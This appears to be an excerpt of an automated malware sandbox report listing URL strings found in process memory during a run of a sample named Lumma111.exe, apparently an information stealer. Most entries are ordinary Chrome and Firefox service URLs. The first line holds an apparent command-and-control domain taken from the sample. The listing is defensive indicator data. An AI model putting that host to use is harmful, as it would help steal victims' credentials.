Source: Lumma111.exe, 00000009.00000003.2584044251.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000002.2590187575.0000000001003000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000003.2584068726.0000000001002000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000003.2583324357.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs/cO
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: chrome.exe, 00000010.00000003.2799527090.0000481C02858000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2866381760.0000481C02844000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
Source: chrome.exe, 00000010.00000003.2793026400.0000481C023C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000010.00000002.2845398055.0000481C022EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: firefox.exe, 0000001D.00000003.2845753242.0000019953033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3303782792.000002087AA79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: chrome.exe, 00000010.00000002.2845398055.0000481C022EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000010.00000002.2845398055.0000481C022EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000010.00000002.2845398055.0000481C022EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2862619011.0000481C02594000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: firefox.exe, 0000001D.00000003.2845753242.0000019953033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3366268374.000002087AD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001D.00000003.2845753242.0000019953033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3366268374.000002087AD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001F.00000002.2929336192.000001994D472000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928726607.000001B63A0CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3047503720.000002086BDDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: chrome.exe, 00000010.00000002.2868360398.0000481C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864618526.0000481C026F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000010.00000002.2870742199.0000481C02B2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2863608559.0000481C026A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868794782.0000481C02984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000010.00000002.2870742199.0000481C02B2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyM
Source: chrome.exe, 00000010.00000002.2870742199.0000481C02B2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2863608559.0000481C026A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868794782.0000481C02984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000010.00000002.2870742199.0000481C02B2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2863608559.0000481C026A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868794782.0000481C02984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000010.00000002.2872339216.0000481C02BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: firefox.exe, 0000001D.00000003.2845753242.0000019953033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3303782792.000002087AA79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: chrome.exe, 00000010.00000002.2858566619.0000481C024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://payments.g
Source: chrome.exe, 00000010.00000002.2858566619.0000481C024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://payments.ge.co
Source: chrome.exe, 00000010.00000002.2872339216.0000481C02BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001D.00000003.2845753242.0000019953033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3366268374.000002087AD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: chrome.exe, 00000010.00000002.2872339216.0000481C02BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: chrome.exe, 00000010.00000002.2844792331.0000481C0228C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001D.00000003.2843820259.0000019955277000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: chrome.exe, 00000010.00000002.2845071498.0000481C022B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869381577.0000481C02A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869381577.0000481C02A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: cfc45d1c7c.exe, 0000000A.00000003.2669570281.0000000005AA0000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2827034300.0000000005A92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: cfc45d1c7c.exe, 0000000C.00000003.2899797959.0000000005B58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: cfc45d1c7c.exe, 0000000C.00000003.2899797959.0000000005B58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: cfc45d1c7c.exe, 0000000A.00000003.2669570281.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2827034300.0000000005A90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: cfc45d1c7c.exe, 0000000A.00000003.2669570281.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2827034300.0000000005A90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: chrome.exe, 00000010.00000002.2872551577.0000481C02C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2929336192.000001994D4CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928726607.000001B63A0CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3074999272.00000208774AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 0000001D.00000003.2841469664.0000019955000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842626549.000001995525A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842327005.000001995523C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2841937085.000001995521F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2843820259.0000019955277000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3113524727.0000020877B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: cfc45d1c7c.exe, 0000000A.00000003.2669887119.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2831456627.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830318335.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830718067.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869212539.0000481C029DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2929336192.000001994D4CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928726607.000001B63A0CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3074999272.00000208774AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: chrome.exe, 00000010.00000002.2865921179.0000481C027E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2872792194.0000481C02C78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000010.00000002.2869450771.0000481C02A1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000010.00000002.2869717115.0000481C02A58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2871330890.0000481C02B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000010.00000002.2869717115.0000481C02A58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2871330890.0000481C02B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: firefox.exe, 0000001D.00000003.2841469664.0000019955000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842626549.000001995525A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842327005.000001995523C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2841937085.000001995521F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2843820259.0000019955277000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: cfc45d1c7c.exe, 0000000A.00000003.2669887119.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2831456627.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830318335.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830718067.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2866120398.0000481C0280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868360398.0000481C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864618526.0000481C026F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2858834589.0000481C024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000010.00000002.2858834589.0000481C024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsightstime
Source: firefox.exe, 0000001D.00000003.2841469664.0000019955000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842626549.000001995525A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842327005.000001995523C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2841937085.000001995521F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2843820259.0000019955277000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3113524727.0000020877B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000010.00000002.2872792194.0000481C02C78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000010.00000002.2843943680.0000481C0221C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
